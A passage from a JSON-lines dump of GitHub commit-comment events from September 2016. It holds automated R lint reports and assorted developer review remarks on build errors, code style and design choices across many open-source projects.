c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n"}},"created_at":"2016-09-20T07:47:10Z"}
{"id":"4588010663","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19092155,"position":130,"line":154,"path":"src/lib/xmodem.fth","commit_id":"ee46dfb7b06ae3f8181881bbbb289ac9f3d16825","created_at":"2016-09-20T07:47:46Z","updated_at":"2016-09-20T07:47:46Z","body":"`init-state` is not defined.\r\n\r\nBuild log:\r\n```\r\n...\r\n./forth kernel.dic ../../src/cforth/load.fth\r\n./makeccalls <../../src/app/esp8266/textend.c >tccalls.fth\r\nBP=/esk/c/tmp/esp8266/cforth/src ./forth forth.dic tccalls.fth ../../src/app/esp8266/app.fth\r\n\r\ninit-state ?\r\nError at:    init-state  |                          ( )\r\nsector# isn't unique\r\nrandom isn't unique\r\nlbflip isn't unique\r\nls isn't unique\r\nexecute-buffer isn't unique\r\nend0 isn't unique\r\n.node isn't unique\r\nstand-init isn't unique\r\nCC ../../src/cforth/embed/makebi.c\r\n...\r\n```\r\n\r\n```"}},"created_at":"2016-09-20T07:47:46Z"}
{"id":"4588010961","type":"CommitCommentEvent","actor":{"login":"joaoe"},"repo":{"name":"Ensembl/VEP_plugins"},"payload":{"comment":{"id":19092157,"position":4,"line":97,"path":"Downstream.pm","commit_id":"bf425dba599ff5d5359b0481a5b1df8afc943da7","created_at":"2016-09-20T07:47:50Z","updated_at":"2016-09-20T07:47:50Z","body":"Since we have this\r\n```my $cds_seq = defined($tr->{_variation_effect_feature_cache}) ? $tr->{_variation_effect_feature_cache}->{translateable_seq} : $tr->translateable_seq;```\r\nshould it also be like\r\n```my $three_prime_utr = defined($tr->{_variation_effect_feature_cache}) ? $tr->{_variation_effect_feature_cache}->{three_prime_utr} : $tr->three_prime_utr;```\r\n?"}},"created_at":"2016-09-20T07:47:50Z"}
{"id":"4588011605","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"glguy/irc-core"},"payload":{"comment":{"id":19092158,"position":null,"line":null,"path":null,"commit_id":"7892e5d3347255f4e15e76665b70ff808dca1aaa","created_at":"2016-09-20T07:47:59Z","updated_at":"2016-09-20T07:47:59Z","body":":+1: :tada: :cake: :beers:\r\n"}},"created_at":"2016-09-20T07:47:59Z"}
{"id":"4588013075","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19092161,"position":null,"line":null,"path":null,"commit_id":"7c6c476e9666f2a67b4b0c88af2f5a8dace437d0","created_at":"2016-09-20T07:48:19Z","updated_at":"2016-09-20T07:48:19Z","body":"@snicolet Thanks, FYI  I just have pushed [this](https://github.com/pb00068/Stockfish/tree/discov_checks_in_see) to try a more general approach of handling discovered checks in SEE."}},"created_at":"2016-09-20T07:48:19Z"}
{"id":"4588015275","type":"CommitCommentEvent","actor":{"login":"Aparna-12"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19092165,"position":null,"line":null,"path":null,"commit_id":"95e4e64b82f84520ffb2d1c6480e604a76d6a9d0","created_at":"2016-09-20T07:48:51Z","updated_at":"2016-09-20T07:48:51Z","body":"Sir,can be take 2 stings "}},"created_at":"2016-09-20T07:48:51Z"}
{"id":"4588016161","type":"CommitCommentEvent","actor":{"login":"Aparna-12"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19092166,"position":null,"line":null,"path":null,"commit_id":"95e4e64b82f84520ffb2d1c6480e604a76d6a9d0","created_at":"2016-09-20T07:49:05Z","updated_at":"2016-09-20T07:49:05Z","body":"For the example "}},"created_at":"2016-09-20T07:49:05Z"}
{"id":"4588019058","type":"CommitCommentEvent","actor":{"login":"swebshet"},"repo":{"name":"swebshet/DSpace"},"payload":{"comment":{"id":19092176,"position":null,"line":null,"path":null,"commit_id":"e6705a3527ffdbc04245a735d6600eb9e7379e25","created_at":"2016-09-20T07:49:47Z","updated_at":"2016-09-20T07:49:47Z","body":"added Ciat Project NO"}},"created_at":"2016-09-20T07:49:47Z"}
{"id":"4588019650","type":"CommitCommentEvent","actor":{"login":"swebshet"},"repo":{"name":"swebshet/DSpace"},"payload":{"comment":{"id":19092178,"position":null,"line":null,"path":null,"commit_id":"e6705a3527ffdbc04245a735d6600eb9e7379e25","created_at":"2016-09-20T07:49:56Z","updated_at":"2016-09-20T07:49:56Z","body":"added Ciat Project NO"}},"created_at":"2016-09-20T07:49:56Z"}
{"id":"4588019978","type":"CommitCommentEvent","actor":{"login":"niner"},"repo":{"name":"mdo-perl/DBIx-Class-AuditLog"},"payload":{"comment":{"id":19092180,"position":10,"line":90,"path":"lib/DBIx/Class/Schema/AuditLog.pm","commit_id":"0045b96223858ff67d9fd8aa79e6e417ac9976ef","created_at":"2016-09-20T07:50:02Z","updated_at":"2016-09-20T07:50:02Z","body":"!= is a numeric comparison. AFAICT $current_changeset is a database row. This cannot be the right operator."}},"created_at":"2016-09-20T07:50:02Z"}
{"id":"4588025086","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19092197,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:51:14Z","updated_at":"2016-09-20T07:51:14Z","body":"> So now you can revert all the skin changes.\r\n\r\nWhy? You didn't understand the rationale then?\r\nLet me try to explain again: the 'e' & 'c' position code can be useful in an embedded screen in a plugin, as the location-layout will then be applicable to all skin-resolutions. But in a skin, where the resolution is of course fixed, it makes no sense to use those relative positions. It only uses resources for calculating a value, that's fixed anyway.\r\nSo as I said: those updates were due anyway. This bug only speeded up actually doing them :)"}},"created_at":"2016-09-20T07:51:14Z"}
{"id":"4588026617","type":"CommitCommentEvent","actor":{"login":"sophokle"},"repo":{"name":"dashesy/amiigo-link"},"payload":{"comment":{"id":19092201,"position":null,"line":null,"path":null,"commit_id":"9c2cf5a2796018ee408e00c14fd16fb4e46ba31f","created_at":"2016-09-20T07:51:34Z","updated_at":"2016-09-20T07:51:34Z","body":"hello dashesy,\r\nfirst of all, thanks for your reply. I'm sorry but no mentions about units in `--help`. Should accel_rate be in seconds too? In addition, what's the interval between two samples in the same light capture session?\r\nThanks for your time."}},"created_at":"2016-09-20T07:51:34Z"}
{"id":"4588029366","type":"CommitCommentEvent","actor":{"login":"jzp820927"},"repo":{"name":"XX-net/XX-Net"},"payload":{"comment":{"id":19092208,"position":null,"line":null,"path":null,"commit_id":"ae7fd8d252f941e6db575593381d3cd3c5288806","created_at":"2016-09-20T07:52:11Z","updated_at":"2016-09-20T07:52:11Z","body":"这个是回归滴节奏麽。。。"}},"created_at":"2016-09-20T07:52:11Z"}
{"id":"4588029872","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19092212,"position":null,"line":null,"path":null,"commit_id":"9549ac897cfaace21617375de8460c35c617f01d","created_at":"2016-09-20T07:52:18Z","updated_at":"2016-09-20T07:52:18Z","body":"Do you account for the fact that in this crude implementation of slider_blockers(), the snipersOnKing[] can be both snipers-for-pins and snipers-for-discovered-checks ?"}},"created_at":"2016-09-20T07:52:18Z"}
{"id":"4588030602","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19092215,"position":null,"line":null,"path":null,"commit_id":"fbad5877b4eb7aebcd4f009a417f3fa70632d9b6","created_at":"2016-09-20T07:52:28Z","updated_at":"2016-09-20T07:52:28Z","body":"[R/ABC_SMC.R:319:6:](https://github.com/richelbilderbeek/nLTT/blob/fbad5877b4eb7aebcd4f009a417f3fa70632d9b6/R/ABC_SMC.R#L319) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(j in seq_along(parameters)) {\n     ^\n```"}},"created_at":"2016-09-20T07:52:28Z"}
{"id":"4588031093","type":"CommitCommentEvent","actor":{"login":"gpichot"},"repo":{"name":"sutoiku/csv-write-stream"},"payload":{"comment":{"id":19092217,"position":null,"line":null,"path":null,"commit_id":"b988c4b526593a7672ce4e4ffdbc81498f06720a","created_at":"2016-09-20T07:52:36Z","updated_at":"2016-09-20T07:52:36Z","body":"@hmalphettes Any feeling about this?"}},"created_at":"2016-09-20T07:52:36Z"}
{"id":"4588032303","type":"CommitCommentEvent","actor":{"login":"stinos"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19092221,"position":null,"line":null,"path":null,"commit_id":"bb954d80a4bd467fc321df90cea2b248a90d1570","created_at":"2016-09-20T07:52:53Z","updated_at":"2016-09-20T07:52:53Z","body":"Unfortunately I have no clue  at the moment: it's not reproducible on my own machine and the diff on the appveyor one doesn't tell me much:\r\n```\r\nC:\\projects\\micropython\\tests>diff cmd_showbc.py.exp cmd_showbc.py.out\r\n30a31,32\r\n>  50 01 68 83 5a 69 83 5b 23 0e 32 80 16 02 50 01\r\n>  68 83 5a 6a 5c 00 81 5c 01 11 5b 81 5b\r\n36,37d37\r\n< (INIT_CELL 16)\r\n<   bc=-4 line=1\r\n```\r\nAny idea where those extra bytes might come from? I don't have enough time right now but later on I'll do some debugging on the appveyor builds."}},"created_at":"2016-09-20T07:52:53Z"}
{"id":"4588035987","type":"CommitCommentEvent","actor":{"login":"dio5"},"repo":{"name":"silverstripe/silverstripe-cms"},"payload":{"comment":{"id":19092232,"position":13,"line":181,"path":"javascript/LeftAndMain_right.js","commit_id":"41aec54e88c2838a862453ad27acbbce075cc3e2","created_at":"2016-09-20T07:53:46Z","updated_at":"2016-09-20T07:53:46Z","body":"It looks like it doesn't work because prototype.js checks for text/javascript to auto-eval... but for some reason the content type is text/javascript;UTF-8...\r\n"}},"created_at":"2016-09-20T07:53:46Z"}
{"id":"4588039835","type":"CommitCommentEvent","actor":{"login":"creesch"},"repo":{"name":"creesch/Reddit-Enhancement-Suite"},"payload":{"comment":{"id":19092244,"position":4,"line":513,"path":"lib/css/modules/_showImages.scss","commit_id":"c8b6916c20d712e05003c28218de869ff551fed9","created_at":"2016-09-20T07:54:39Z","updated_at":"2016-09-20T07:54:39Z","body":"Yeah that would work as well, I just figured this was actually more specific. "}},"created_at":"2016-09-20T07:54:39Z"}
{"id":"4588041407","type":"CommitCommentEvent","actor":{"login":"xiaoqiang1314"},"repo":{"name":"xiaoqiang1314/test"},"payload":{"comment":{"id":19092251,"position":9,"line":23,"path":"Demo/Demo/ViewController.m","commit_id":"e68f70950ce4de0947da87cf3b554492291ba506","created_at":"2016-09-20T07:55:01Z","updated_at":"2016-09-20T07:55:01Z","body":"这里没有问题"}},"created_at":"2016-09-20T07:55:01Z"}
{"id":"4588041782","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092253,"position":null,"line":null,"path":null,"commit_id":"28d7c75c5dadd380e6866a9b78bf76c7f546a52b","created_at":"2016-09-20T07:55:06Z","updated_at":"2016-09-20T07:55:06Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1054](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13583&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:12:33"}},"created_at":"2016-09-20T07:55:06Z"}
{"id":"4588042199","type":"CommitCommentEvent","actor":{"login":"gaoshangs"},"repo":{"name":"yzprofile/nginx_upstream_check_module"},"payload":{"comment":{"id":19092257,"position":null,"line":null,"path":null,"commit_id":"2eb445171d3b0273d27fb841d96af9f6935834d7","created_at":"2016-09-20T07:55:12Z","updated_at":"2016-09-20T07:55:12Z","body":"Thank you very much to the development of feature, I have been plagued by health and check compatibility issues, this I spent a long time, when I see you have time to submit this feature, I immediately compile test, it works very well, thank you very much for the efforts you have made, but also hope to earlier merged into the yaoweibin/nginx_upstream_check_module program, I hope a lot of people plagued by this problem, finally thank you very much."}},"created_at":"2016-09-20T07:55:12Z"}
{"id":"4588048059","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19092274,"position":5,"line":406,"path":"resources/definitions/fdmprinter.def.json","commit_id":"6909f88ce6d3ea335fc2bd2f159fe64c2105aa21","created_at":"2016-09-20T07:56:34Z","updated_at":"2016-09-20T07:56:34Z","body":"Yes, I know. A flawed view/controller doesn't mean that the model has to adapt to it though :wink:"}},"created_at":"2016-09-20T07:56:34Z"}
{"id":"4588048923","type":"CommitCommentEvent","actor":{"login":"edent"},"repo":{"name":"edent/Dabr"},"payload":{"comment":{"id":19092276,"position":null,"line":null,"path":null,"commit_id":"59f75b9436399bcaf96988ee57a95908e4125caf","created_at":"2016-09-20T07:56:46Z","updated_at":"2016-09-20T07:56:46Z","body":"Fixes #133 and, apparently fixes #132 "}},"created_at":"2016-09-20T07:56:46Z"}
{"id":"4588049681","type":"CommitCommentEvent","actor":{"login":"ClementVH"},"repo":{"name":"ClementVH/YoutubeDesktop"},"payload":{"comment":{"id":19092278,"position":6,"line":0,"path":"Makefile","commit_id":"66bbd5bf87e44608bb303ff542f340e16bd4ab2d","created_at":"2016-09-20T07:56:57Z","updated_at":"2016-09-20T07:56:57Z","body":"Ajouter node_modules en dépendance"}},"created_at":"2016-09-20T07:56:57Z"}
{"id":"4588050343","type":"CommitCommentEvent","actor":{"login":"mdo"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19092280,"position":null,"line":null,"path":null,"commit_id":"63129112bbea91f7cd62014f162f857f50084656","created_at":"2016-09-20T07:57:01Z","updated_at":"2016-09-20T07:57:01Z","body":"@tomlutzenberger You were fine until you said \"talk like a redneck.\" Next time leave that part out. I'd rather curse over this place than insult folks :)."}},"created_at":"2016-09-20T07:57:01Z"}
{"id":"4588050794","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/SafeSharp"},"payload":{"comment":{"id":19092283,"position":null,"line":null,"path":null,"commit_id":"7899de4ea9dca592290bd0fdc1529f8ff5eccfd4","created_at":"2016-09-20T07:57:13Z","updated_at":"2016-09-20T07:57:13Z","body":"ㅁㅊ다ㅁㅊ어"}},"created_at":"2016-09-20T07:57:13Z"}
{"id":"4588052653","type":"CommitCommentEvent","actor":{"login":"pjc0247"},"repo":{"name":"pjc0247/SafeSharp"},"payload":{"comment":{"id":19092288,"position":null,"line":null,"path":null,"commit_id":"7899de4ea9dca592290bd0fdc1529f8ff5eccfd4","created_at":"2016-09-20T07:57:41Z","updated_at":"2016-09-20T07:57:41Z","body":"코드줄가"}},"created_at":"2016-09-20T07:57:41Z"}
{"id":"4588052671","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19092289,"position":9,"line":123,"path":"xwiki-platform-core/xwiki-platform-security/xwiki-platform-security-api/src/main/java/org/xwiki/security/authorization/cache/internal/SecurityCache.java","commit_id":"53dbabc7c723cf6e9bc41d98947d6f3a7951edc0","created_at":"2016-09-20T07:57:41Z","updated_at":"2016-09-20T07:57:41Z","body":"I used comma to separate the versions so far, https://github.com/xwiki/xwiki-platform/blob/master/xwiki-platform-core/xwiki-platform-tree/xwiki-platform-tree-api/src/main/java/org/xwiki/tree/script/TreeScriptService.java#L40 and I remember I've seen others doing the same."}},"created_at":"2016-09-20T07:57:41Z"}
{"id":"4588054039","type":"CommitCommentEvent","actor":{"login":"ih24n69"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19092295,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-20T07:58:01Z","updated_at":"2016-09-20T07:58:01Z","body":"@ngoquang2708 awesome bro for brough N version :D ...\r\nAnd out of topic.... I want to ask.\r\nWhat I need in kernel to make CM13 booting to home?  I am from Core 2 device Ih24n@xda."}},"created_at":"2016-09-20T07:58:01Z"}
{"id":"4588054164","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092298,"position":null,"line":null,"path":null,"commit_id":"ce19bb6d8655cb70e4fdda0f48ccd73c364834c3","created_at":"2016-09-20T07:58:03Z","updated_at":"2016-09-20T07:58:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1055](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13584&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T07:58:03Z"}
{"id":"4588054885","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-api"},"payload":{"comment":{"id":19092302,"position":12,"line":217,"path":"handlers/changes.js","commit_id":"0a12516b38907363f9907854784319c2317a3e82","created_at":"2016-09-20T07:58:14Z","updated_at":"2016-09-20T07:58:14Z","body":"Both removed."}},"created_at":"2016-09-20T07:58:14Z"}
{"id":"4588058424","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19092314,"position":2,"line":1,"path":"src/templates/projects/project.html","commit_id":"276b6b1fed71ba510d4de33c3f96e990eb9bcae3","created_at":"2016-09-20T07:59:06Z","updated_at":"2016-09-20T07:59:06Z","body":"@llopv this class breaks some things that are aligned left in other steps\r\n\r\nI would expect the default to be aligned left and text-center only the sections that are center aligned. What do you think?"}},"created_at":"2016-09-20T07:59:06Z"}
{"id":"4588058485","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19092315,"position":17,"line":4397,"path":"server/CGameHandler.cpp","commit_id":"58f90b736bcd3cb0c966f217b700a92ae4e42ed7","created_at":"2016-09-20T07:59:07Z","updated_at":"2016-09-20T07:59:07Z","body":"Do you really want to do this comparison inside tripple loop? Define bool flag instead."}},"created_at":"2016-09-20T07:59:07Z"}
{"id":"4588061946","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-api"},"payload":{"comment":{"id":19092326,"position":62,"line":62,"path":"tests/e2e/handlers/changes.js","commit_id":"0a12516b38907363f9907854784319c2317a3e82","created_at":"2016-09-20T07:59:56Z","updated_at":"2016-09-20T07:59:56Z","body":"err...yep!  Removed."}},"created_at":"2016-09-20T07:59:56Z"}
{"id":"4588063280","type":"CommitCommentEvent","actor":{"login":"sdeleuze"},"repo":{"name":"sdeleuze/spring-framework"},"payload":{"comment":{"id":19092327,"position":79,"line":77,"path":"spring-web/src/main/java/org/springframework/http/codec/AbstractServerHttpMessageWriter.java","commit_id":"b17f596f60fac7af458e6cf5b3cfcb911d0c3744","created_at":"2016-09-20T08:00:13Z","updated_at":"2016-09-20T08:00:13Z","body":"It returns hints, but it also allow to set the status and various other things possible via `ServerHttpResponse`, that why I chose a less opinionated name. Any thoughts?"}},"created_at":"2016-09-20T08:00:13Z"}
{"id":"4588064284","type":"CommitCommentEvent","actor":{"login":"assaad"},"repo":{"name":"kevoree-modeling/mwDB"},"payload":{"comment":{"id":19092331,"position":null,"line":null,"path":null,"commit_id":"6398a766929c4ccb1d3a11f71cb5544f939f99c5","created_at":"2016-09-20T08:00:25Z","updated_at":"2016-09-20T08:00:25Z","body":"yep in many places the same problem as well: like NodeA.set(\"value\",Type.Double, 42); will not work as well because 42 is considered as int"}},"created_at":"2016-09-20T08:00:25Z"}
{"id":"4588066497","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/SafeSharp"},"payload":{"comment":{"id":19092335,"position":null,"line":null,"path":null,"commit_id":"7899de4ea9dca592290bd0fdc1529f8ff5eccfd4","created_at":"2016-09-20T08:00:56Z","updated_at":"2016-09-20T08:00:56Z","body":"이게 머하는 건지 몰겠어서 봐봤자 이해못할듯"}},"created_at":"2016-09-20T08:00:56Z"}
{"id":"4588069717","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19092343,"position":null,"line":null,"path":null,"commit_id":"7c6c476e9666f2a67b4b0c88af2f5a8dace437d0","created_at":"2016-09-20T08:01:40Z","updated_at":"2016-09-20T08:01:40Z","body":"Interesting!\r\n\r\nYou can also consider using something similar to the condition `!aligned(from, to, square<KING>(color)))` to handle discovered checks by pawns "}},"created_at":"2016-09-20T08:01:40Z"}
{"id":"4588070698","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19092345,"position":null,"line":null,"path":null,"commit_id":"dfadb95c919ee21d0b9e3bb0e3a207c1f0b0a3b7","created_at":"2016-09-20T08:01:55Z","updated_at":"2016-09-20T08:01:55Z","body":"Be careful with those kind of changes, they can break mssql."}},"created_at":"2016-09-20T08:01:55Z"}
{"id":"4588071452","type":"CommitCommentEvent","actor":{"login":"jvperrin"},"repo":{"name":"ocf/puppet"},"payload":{"comment":{"id":19092348,"position":null,"line":null,"path":null,"commit_id":"9c2124c68b2cd360732b529741d29a5337bae250","created_at":"2016-09-20T08:02:06Z","updated_at":"2016-09-20T08:02:06Z","body":"Yeah, thanks for doing this, I manually synced from the kernel.org mirror a few days ago to keep it relatively up-to-date, but this is a lot better. Looks like MTU is back up too, but at a different location now: http://mirrors.lug.mtu.edu/archlinux/"}},"created_at":"2016-09-20T08:02:06Z"}
{"id":"4588076668","type":"CommitCommentEvent","actor":{"login":"pjc0247"},"repo":{"name":"pjc0247/SafeSharp"},"payload":{"comment":{"id":19092353,"position":null,"line":null,"path":null,"commit_id":"7899de4ea9dca592290bd0fdc1529f8ff5eccfd4","created_at":"2016-09-20T08:03:21Z","updated_at":"2016-09-20T08:03:21Z","body":"```cs\r\npublic static T Try<T>(Action action, T def)\r\n        {\r\n            return def;\r\n\r\n            //Console.WriteLine(\"\\'dic\\' is null.\");\r\n            //return def;\r\n\r\n            //Console.WriteLine(\"key \\'a\\' was not found in Dictionary \\'dic\\'.\");\r\n            //return def;\r\n        }\r\n```\r\n\r\n적당히 주석풀고 쓰면됨"}},"created_at":"2016-09-20T08:03:21Z"}
{"id":"4588079455","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19092355,"position":null,"line":null,"path":null,"commit_id":"dfadb95c919ee21d0b9e3bb0e3a207c1f0b0a3b7","created_at":"2016-09-20T08:03:45Z","updated_at":"2016-09-20T08:03:45Z","body":"@LouisGac : here there are no update of request ? Only factor out ? No ?"}},"created_at":"2016-09-20T08:03:45Z"}
